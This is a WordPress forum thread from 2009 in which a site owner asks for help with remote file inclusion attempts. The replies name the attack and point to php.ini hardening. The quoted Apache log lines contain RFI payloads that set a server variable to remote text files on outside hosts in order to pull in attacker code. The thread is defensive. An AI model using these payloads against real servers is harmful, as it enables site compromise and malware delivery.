Possible PHP injection attack on WordPress site

  • I have a problem with someone trying attacks on my wordpress server. This server only runs the wordpress blog, nothing else.

    The server is
    Centos 5 – 2.6.18.8-el5 kernel
    PHP 5.16
    Apache 2.2.3
    mysql 5.0.22
    Wordpress 2.8

    I noticed on the Wassup plug output that I was getting hits to this page on my site

    /?_SERVERDOCUMENT_ROOT=https://www.desrem.ru/files/ec.txt?

    when I followed it, it tried to download a trojan whoch my PC s/w blocked. I checked the Apache access log and there have been a few of these in the last few hours

    82.195.150.228 – – [15/Jul/2009:06:05:34 +1000] “GET /?_SERVER[DOCUMENT_ROOT]=https://www.medchoicefinancial.com/ec.txt? HTTP/1.1” 200 35695
    82.195.150.228 – – [15/Jul/2009:06:58:01 +1000] “GET /?_SERVER[DOCUMENT_ROOT]=https://www.desrem.ru/files/ec.txt? HTTP/1.1” 200 35685
    67.15.206.26 – – [15/Jul/2009:07:18:33 +1000] “GET /?_SERVER[DOCUMENT_ROOT]=https://www.desrem.ru/files/ec.txt? HTTP/1.1” 200 35685
    192.168.0.2 – – [15/Jul/2009:09:47:12 +1000] “GET /?_SERVERDOCUMENT_ROOT=https://www.desrem.ru/files/ec.txt? HTTP/1.1” 200 34187
    201.232.54.48 – – [15/Jul/2009:11:22:57 +1000] “GET /?_SERVER[DOCUMENT_ROOT]=https://www.desrem.ru/files/ec.txt? HTTP/1.1” 200 39381
    192.168.0.2 – – [15/Jul/2009:10:55:05 +1000] “GET /?_SERVERDOCUMENT_ROOT=https://www.desrem.ru/files/ec.txt? HTTP/1.1” 200 43329

    I have put my site into Maintenance mode until I can sort this out. I am guessing that a PHP variable has been changed, but the /etc/php.ini file hasnt been changes. I rebooted incase it was a variale in memory but these attacks still seem to be happening.

    I have done some Google searches on this but havent really found anything.

    Any thoughts or assistance would be appreciated

    -todd-

Viewing 2 replies - 1 through 2 (of 2 total)

  • Hello Todd, my own blog has been hit by this as well. I have still not figured out how to prevent these totally, but to at least stop them from redirecting, go here:

    https://blogingenuity.com/2009/05/14/remote-file-inclusion-rfi-attempts-detecting-tracking-and-mitigating/#more-369

    … and follow the instructions in “Stronger Security Hardening Via php.ini”

    I will post here again when I’ve figured out how to completely stop it on my own site.

    As always, be sure to backup any files you modify just in case it causes problems. Hope that helps!

    As far as I can tell those are classic Remote File Inclusion attempts. I would be concerned, though not overly, that the attempts are returning response codes of 200.

    aznbbj linked to my article, which is sort of a summary of the research I did on RFI attacks back when the same thing happened to me. It’s got a number of ways to mitigate the attacks, from the very simple and not-so-effective to editing of your php.ini file to remove functionality that the RFI attacks utilize.

    Hope it helps.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Possible PHP injection attack on WordPress site’ is closed to new replies.